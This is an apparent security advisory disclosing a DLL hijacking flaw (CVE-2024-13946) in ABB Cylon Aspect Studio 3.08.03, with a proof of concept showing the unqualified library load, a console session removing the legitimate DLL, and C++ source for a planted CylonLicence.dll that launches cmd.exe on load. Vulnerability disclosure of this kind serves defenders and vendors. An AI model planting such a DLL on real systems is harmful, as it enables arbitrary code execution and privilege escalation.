ABB Cylon Aspect Studio 3.08.03 (CylonLicence.dll) Binary Planting Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: <=3.08.03 Summary: ABB Cylon ASPECT Studio is a graphical programming tool and integrated development environment (IDE) for ABB Cylon ASPECT products. It's used to engineer comprehensive area control and graphical user interface (GUI) solutions, containing a library of logical and graphical widgets. It allows users to monitor and control facilities from anywhere, providing insights into building performance and enabling timely reactions to issues. Desc: A DLL hijacking vulnerability exists in Aspect-Studio version 3.08.03, where the application attempts to load a library named CylonLicence via System.loadLibrary("CylonLicence") without a full path, falling back to the standard library search order. If an attacker can plant a malicious CylonLicence.dll in a writable directory that is searched before the legitimate library path, this DLL will be loaded and executed with the privileges of the user running the application. This flaw enables arbitrary code execution and can be exploited for privilege escalation or persistence, especially in environments where the application is executed by privileged users. Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5952 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php CVE ID: CVE-2024-13946 CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946 21.04.2024 -- C:\> type project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat REM 64bit parameters jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class ... ... System.loadLibrary("CylonLicence"); } catch (Throwable t) {} LoggerUtil.logger.error("Error loading license DLL", t); } } ... ... C:\Aspect\Aspect-Studio-3.08.03> cd logs C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main] java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867) at java.lang.Runtime.loadLibrary0(Runtime.java:870) at java.lang.System.loadLibrary(System.java:1122) at com.aamatrix.util.AspectStudio.(AspectStudio.java:42) at com.aamatrix.vib.rrobin.CylonLicense.(CylonLicense.java:18) at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:38) at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:34) at com.aamatrix.projectmanager.AspectStudio.(AspectStudio.java:52) at java.lang.Class.forName0(Native Method) at java.lang.Class.forName(Class.java:348) at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70) ... ... C:\DLL-Mala> type CylonLicence.cpp #define WIN32_LEAN_AND_MEAN #include #include extern "C" __declspec(dllexport) DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) { ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL); return 0; } extern "C" __declspec(dllexport) BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }